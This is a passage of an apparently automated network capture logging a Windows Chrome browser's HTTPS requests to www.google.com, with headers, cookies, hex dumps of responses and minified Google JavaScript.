Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:26 UTC	816	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 9387 Date: Thu, 12 Dec 2024 21:40:26 GMT Expires: Fri, 12 Dec 2025 21:40:26 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:26 UTC	574	IN	Data Raw: 7b 22 63 68 75 6e 6b 54 79 70 65 73 22 3a 22 33 30 30 31 31 31 31 31 31 31 31 31 30 30 31 31 31 30 30 30 31 31 31 31 31 31 31 30 30 31 31 31 31 30 30 30 31 30 30 30 30 31 30 31 31 30 31 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 30 31 31 31 31 31 31 31 31 31 30 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: {"chunkTypes":"300111111111001110001111111001111000100001011010011111111111111001111111110111011111111111111111111101011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 32 32 32 32 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 31 32 31 32 32 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 Data Ascii: 121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121222121212121212121222122222222121212121212121212221212121212122121212121212121212121212111212221212121212121212121212112
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 33 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 32 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 32 31 33 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 30 31 31 31 31 31 31 30 31 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111311121311111111111111111111111111111111111111111311111111311111131111111111111111111111111110111111111111111111111111111111111311111111121311111111111111111111121111111121313111111111111111311011111101011111111111111111111111111111111111111111111
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 32 31 32 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 31 32 31 32 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 31 31 31 32 31 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 31 32 31 33 33 31 31 31 31 31 31 31 31 31 33 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 33 31 31 31 31 31 31 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 31 32 31 32 31 32 31 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 Data Ascii: 121212121212121212121212121212121212121212121212121212112121212212212112121212121212121212121121121211212121121212121211111211212121212112121121331111111113212121212121212121212121212121212121212121212121213111111121121212121212112121211212121212121212121
2024-12-12 21:40:26 UTC	1390	IN	Data Raw: 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 33 31 31 31 31 31 31 31 32 31 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 32 31 32 31 31 31 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 33 33 31 33 31 31 33 31 31 31 33 33 31 31 31 31 31 31 31 31 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 33 33 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 31 31 31 31 31 31 31 31 Data Ascii: 111111111111111111111111111111111111111111111111111111111111131111131111111212112111111111111111111111111111111111111111212121111131111111111111113311111111111111111111111111111111111313313113111331111111133111111111111111111113333111111111111111211111111
2024-12-12 21:40:26 UTC	473	IN	Data Raw: 32 32 32 32 32 32 32 32 32 32 32 31 31 33 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 33 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 32 33 31 31 31 31 33 31 31 31 32 32 32 32 32 32 32 32 32 32 33 31 31 31 31 31 31 32 32 32 32 33 31 30 30 30 30 32 30 32 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 31 33 31 31 32 32 32 31 32 32 32 32 32 32 31 31 32 31 31 31 31 31 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 33 31 31 31 31 31 31 33 33 31 31 31 32 32 32 33 32 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 Data Ascii: 222222222221131100000000000000000000000113111111111111111123111131112222222222311111122223100002020000000000200000000000013112221222222112111111111110000000000000000000000000000000000000000000000000001111111111111111311111133111222320000000002000000000000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49747	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:26 UTC	1540	OUT	GET /gen_204?s=async&astyp=hpba&atyp=csi&ei=R1hbZ9m8AcmJ7NYPytGlUA&rt=ipf.0,ipfr.2828,ttfb.2828,st.2829,acrt.2830,ipfrl.2830,aaft.2830,art.2830,ns.-8926&ns=1734039611012&twt=1.3999999999941792&mwt=1.3999999999941792 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:27 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Zb585FRc7s6lj8gLZ4jQRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:26 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49745	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:26 UTC	2787	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=sb_wiz,aa,abd,sy17o,syfz,syfr,syfp,syfq,syfs,syg0,syg1,syfw,syfv,syfu,syep,syft,syfj,syfi,syfk,syfh,syfm,sy16j,sygb,sy17m,syyl,syga,syg9,syg8,async,ifl,pHXghd,sf,syig,sy3kp,sonic,sy3kv,syhl,syh1,sy3k7,sy3ka,sy274,sye3,sy9u,sy9f,sy9e,sy9c,spch,syti,syth,rtH1bd,sy19k,sy15l,sy151,sy12b,sydb,sy19i,SMquOb,sy7k,sy7j,syf3,syfe,syfc,syfb,syf2,syf0,syey,sy86,sy83,sy85,syex,syf1,syew,sybg,syb9,sybc,syaj,syap,syai,syah,syag,sya4,syba,syax,syay,syb4,syan,syb3,syaw,syat,syae,syal,syaz,sya6,sya8,sya9,sya5,syao,syad,syaa,sybj,sya0,sy9x,sybi,sy9p,sy9h,sy9k,sy9w,sya3,syb0,syev,syeu,syer,syeq,sy89,uxMpU,syem,sybq,s [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ
2024-12-12 21:40:27 UTC	818	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 380831 Date: Thu, 12 Dec 2024 21:40:26 GMT Expires: Fri, 12 Dec 2025 21:40:26 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 17:02:52 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:27 UTC	572	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 79 28 22 73 62 5f 77 69 7a 22 29 3b 0a 0a 5f 2e 7a 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 61 61 22 29 3b 0a 0a 5f 2e 7a 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 61 62 64 22 29 3b 0a 76 61 72 20 50 66 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 22 2c 63 3d 32 31 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 64 25 34 21 3d 33 26 26 28 62 2b 3d 53 74 72 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.y("sb_wiz");_.z();}catch(e){_._DumpException(e)}try{_.y("aa");_.z();}catch(e){_._DumpException(e)}try{_.y("abd");var Pfi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=Str
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 22 3a 22 30 22 29 29 3b 72 65 74 75 72 6e 20 62 2e 6a 6f 69 6e 28 22 2c 22 29 7d 2c 59 66 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 53 74 72 69 6e 67 28 61 29 3b 62 26 26 28 61 2b 3d 22 2c 22 2b 62 29 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 28 58 66 69 2c 61 29 7d 2c 5a 66 69 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 63 3d 0a 63 3d 3d 3d 76 6f 69 64 20 30 3f 32 3a 63 3b 69 66 28 63 3c 31 29 59 66 69 28 37 2c 62 29 3b 65 6c 73 65 7b 76 61 72 20 64 3d 6e 65 77 20 49 6d 61 67 65 3b 64 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 5a 66 69 28 61 2c 62 2c 63 2d 31 29 7d 3b 64 2e 73 72 63 3d 61 7d 7d 2c 53 66 69 3d 50 66 69 28 5b 39 37 2c 31 31 39 2c 31 31 35 2c 31 31 31 2c 31 30 37 5d 29 2c 55 66 69 3d 50 66 69 28 5b 39 37 2c 31 31 Data Ascii: ":"0"));return b.join(",")},Yfi=function(a,b){a=String(a);b&&(a+=","+b);google.log(Xfi,a)},Zfi=function(a,b,c){c=c===void 0?2:c;if(c<1)Yfi(7,b);else{var d=new Image;d.onerror=function(){Zfi(a,b,c-1)};d.src=a}},Sfi=Pfi([97,119,115,111,107]),Ufi=Pfi([97,11
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 64 61 74 61 3a 22 29 29 7b 76 61 72 20 63 3d 66 49 62 28 61 2e 73 72 63 2c 30 2c 62 2c 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 26 26 61 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 30 29 3b 61 2e 73 72 63 21 3d 3d 63 2e 73 72 63 26 26 28 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 77 69 64 74 68 3d 63 2e 77 69 64 74 68 3b 61 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 7d 2c 61 2e 73 72 63 3d 63 2e 73 72 63 2c 61 2e 63 6f 6d 70 6c 65 74 65 26 26 28 61 2e 77 69 64 74 68 3d 63 2e 77 69 64 74 68 29 29 7d 7d 3b 69 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 22 30 22 3f 22 22 3a 61 2b 22 70 78 22 7d 3b 6a 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 Data Ascii: data:")){var c=fIb(a.src,0,b,a.parentElement&&a.parentElement.clientWidth\|\|0);a.src!==c.src&&(a.onload=function(){a.width=c.width;a.onload=null},a.src=c.src,a.complete&&(a.width=c.width))}};iIb=function(a){return a==="0"?"":a+"px"};jIb=function(a){return
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 5f 2e 4c 48 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 2e 62 76 7c 7c 22 22 3b 5f 2e 4d 48 62 3d 6e 65 77 20 4d 61 70 3b 5f 2e 68 70 61 28 22 73 6b 65 77 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 22 22 2c 62 3d 21 30 2c 63 3d 5f 2e 63 62 28 5f 2e 4d 48 62 2e 65 6e 74 72 69 65 73 28 29 29 2c 64 3d 63 2e 6e 65 78 74 28 29 3b 21 64 2e 64 6f 6e 65 3b 64 3d 63 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 65 3d 5f 2e 63 62 28 64 2e 76 61 6c 75 65 29 3b 64 3d 65 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 65 3d 65 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 61 2b 3d 28 62 3f 22 22 3a 22 2c 22 29 2b 64 2b 22 2e 22 2b 65 3b 62 3d 21 Data Ascii: _.LHb=window.google&&window.google.erd&&window.google.erd.bv\|\|"";_.MHb=new Map;_.hpa("skew",function(){for(var a="",b=!0,c=_.cb(_.MHb.entries()),d=c.next();!d.done;d=c.next()){var e=_.cb(d.value);d=e.next().value;e=e.next().value;a+=(b?"":",")+d+"."+e;b=!
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 61 2e 6b 61 29 2c 64 3d 63 2e 6e 65 78 74 28 29 3b 21 64 2e 64 6f 6e 65 3b 64 3d 63 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 65 3d 64 2e 76 61 6c 75 65 3b 64 3d 65 2e 72 65 73 6f 6c 76 65 3b 65 3d 65 2e 72 65 6a 65 63 74 3b 62 3f 65 28 62 29 3a 64 28 7b 76 61 6c 75 65 3a 76 6f 69 64 20 30 2c 64 6f 6e 65 3a 21 30 7d 29 7d 61 2e 6b 61 2e 6c 65 6e 67 74 68 3d 30 7d 7d 3b 5f 2e 72 76 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 69 66 28 74 68 69 73 2e 6f 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 62 3d 74 68 69 73 2e 6f 61 2e 73 68 69 66 74 28 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 7b 76 61 6c 75 65 3a 62 2c 64 6f 6e 65 3a 21 31 7d 29 7d 72 65 74 75 72 6e 20 Data Ascii: a.ka),d=c.next();!d.done;d=c.next()){var e=d.value;d=e.resolve;e=e.reject;b?e(b):d({value:void 0,done:!0})}a.ka.length=0}};_.rv.prototype.next=function(){var a=this;if(this.oa.length){var b=this.oa.shift();return Promise.resolve({value:b,done:!1})}return
2024-12-12 21:40:27 UTC	1390	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 55 69 28 74 68 69 73 2c 31 29 7d 3b 5f 2e 5a 48 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 45 61 3d 5f 2e 6e 28 61 29 7d 3b 5f 2e 47 28 5f 2e 5a 48 62 2c 5f 2e 72 29 3b 76 61 72 20 24 48 62 2c 61 49 62 3b 5f 2e 50 48 62 3d 5f 2e 78 65 28 5f 2e 63 61 2e 6b 61 3f 22 6e 22 3a 22 73 22 2c 5f 2e 48 4d 61 29 3b 24 48 62 3d 6e 65 77 20 4d 61 70 3b 61 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 6b 61 3d 6e 75 6c 6c 3b 74 68 69 73 2e 6f 61 3d 61 2b 22 5f 5f 68 22 3b 74 68 69 73 2e 77 61 3d 61 2b 22 5f 5f 72 22 3b 74 68 69 73 2e 70 72 69 6f 72 69 74 79 3d 62 26 26 62 2e 70 72 69 6f 72 69 74 79 7d 3b 5f 2e 62 49 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 Data Ascii: =function(){return _.Ui(this,1)};_.ZHb=function(a){this.Ea=_.n(a)};_.G(_.ZHb,_.r);var $Hb,aIb;_.PHb=_.xe(_.ca.ka?"n":"s",_.HMa);$Hb=new Map;aIb=function(a,b){this.ka=null;this.oa=a+"__h";this.wa=a+"__r";this.priority=b&&b.priority};_.bIb=function(a,b){var
